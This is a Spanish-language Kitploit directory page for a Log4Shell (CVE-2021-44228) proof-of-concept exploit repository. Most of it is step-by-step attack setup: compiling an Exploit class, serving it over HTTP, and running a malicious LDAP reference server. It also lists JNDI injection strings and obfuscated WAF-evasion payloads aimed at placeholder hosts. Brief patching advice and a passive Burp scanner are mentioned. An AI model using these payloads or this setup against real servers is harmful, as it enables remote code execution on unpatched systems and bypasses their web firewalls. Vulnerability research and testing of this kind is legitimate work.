Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-Apache-Log4j-Rce — Exploit de prueba de concepto para CVE-2021-44228 (Log4Shell) con cargas útiles de inyección JNDI, técnicas de evasión de WAF e integración de escaneo pasivo para Burp Suite. | Kitploit
Herramientas/GitHubGitHub/kannthu/cve-2021-44228-apache-log4j-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónDesarrollo de Payloads
GitHubkannthu/cve-2021-44228-apache-log4j-rce

CVE-2021-44228-Apache-Log4j-Rce

Exploit de prueba de concepto para CVE-2021-44228 (Log4Shell) con cargas útiles de inyección JNDI, técnicas de evasión de WAF e integración de escaneo pasivo para Burp Suite.

Ver Repositorio
37hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228 (Ejecución Remota de Código en Apache Log4j)

todas las versiones de log4j-core >=2.0-beta9 y <=2.14.1

Las versiones 1.x tienen otras vulnerabilidades, recomendamos que actualice a la última versión.

Avisos / Boletines de seguridad relacionados con Log4Shell (CVE-2021-44228)

Uso:

root@kitploit:~
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
# For Python2
python -m SimpleHTTPServer 8888 
# For Python3
python3 -m http.server 8888
root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Finalmente, ejecute el proyecto y verá su calculadora desde local.

Consejos:

No confíe en una versión actual de Java para salvarse. Actualice Log4 (o elimine la búsqueda JNDI). Deshabilite la expansión (de todos modos parece una muy mala idea).

Evasión rc1

Por ejemplo:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

Evasión de WAF

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

No confíe en el firewall de aplicaciones web.

Detalles de la Vulnerabilidad

Las búsquedas (lookups) proporcionan una forma de agregar valores a la configuración de Log4j en lugares arbitrarios.

Lookups

Los métodos para causar una fuga en finally

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

Método de Verificación Simple

Si desea realizar pruebas de caja negra, le sugiero que realice un escaneo pasivo.

BurpLog4jScan

¡Diviértete!!! BurpLog4jScan.png

Estrellas a lo largo del tiempo

Stargazers over time

Descargar herramienta